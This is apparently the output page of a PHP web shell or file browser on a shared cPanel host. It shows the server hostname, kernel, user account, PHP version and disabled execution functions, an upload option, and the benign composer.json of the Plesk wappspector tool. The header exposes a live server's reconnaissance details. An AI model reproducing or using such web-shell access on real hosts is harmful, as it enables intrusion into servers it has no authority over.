HEX
Server: LiteSpeed
System: Linux atali.colombiahosting.com.co 5.14.0-570.12.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 13 06:11:55 EDT 2025 x86_64
User: coopserp (1713)
PHP: 8.2.29
Disabled: dl,exec,passthru,proc_open,proc_close,shell_exec,memory_limit,system,popen,curl_multi_exec,show_source,symlink,link,leak,listen,diskfreespace,tmpfile,ignore_user_abord,highlight_file,source,show_source,fpaththru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,posix_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setid,posix_times,posix_ttyname,posix_uname,proc_get_status,proc_nice,proc_terminate
Upload Files
File: //opt/cpanel/ea-wappspector/composer.json
{
  "name": "plesk/wappspector",
  "version": "0.2.8",
  "description": "Command-line interface utility to analyze the file structure of a web hosting server and identify the frameworks and CMS used in the websites hosted on it.",
  "type": "project",
  "license": "Apache-2.0",
  "bin": [
    "bin/wappspector.php"
  ],
  "scripts": {
    "test": "phpunit",
    "rector": "rector --dry-run",
    "rector:fix": "rector",
    "lint": "phpcs -s --parallel=4",
    "lint:fix": "phpcbf",
    "ci:standards": "phpcs -s --parallel=4 --report=json",
    "ci:rector": "rector --dry-run --output-format=json"
  },
  "scripts-descriptions": {
    "lint": "Run linters"
  },
  "autoload": {
    "psr-4": {
      "Plesk\\Wappspector\\": "src/",
      "Test\\": "tests/"
    }
  },
  "require-dev": {
    "mikey179/vfsstream": "^1.6",
    "phpunit/phpunit": "^10",
    "psr/log": "^2.0",
    "rector/rector": "^1.0",
    "slevomat/coding-standard": "^8.8.0",
    "squizlabs/php_codesniffer": "^3.7.2",
    "symfony/console": "^5.0"
  },
  "require": {
    "php": ">=8.0",
    "clue/phar-composer": "^1.4",
    "league/flysystem": "^3.0",
    "php-di/php-di": "^6.0 || ^7.0"
  },
  "config": {
    "sort-packages": true,
    "allow-plugins": {
      "dealerdirect/phpcodesniffer-composer-installer": true
    }
  }
}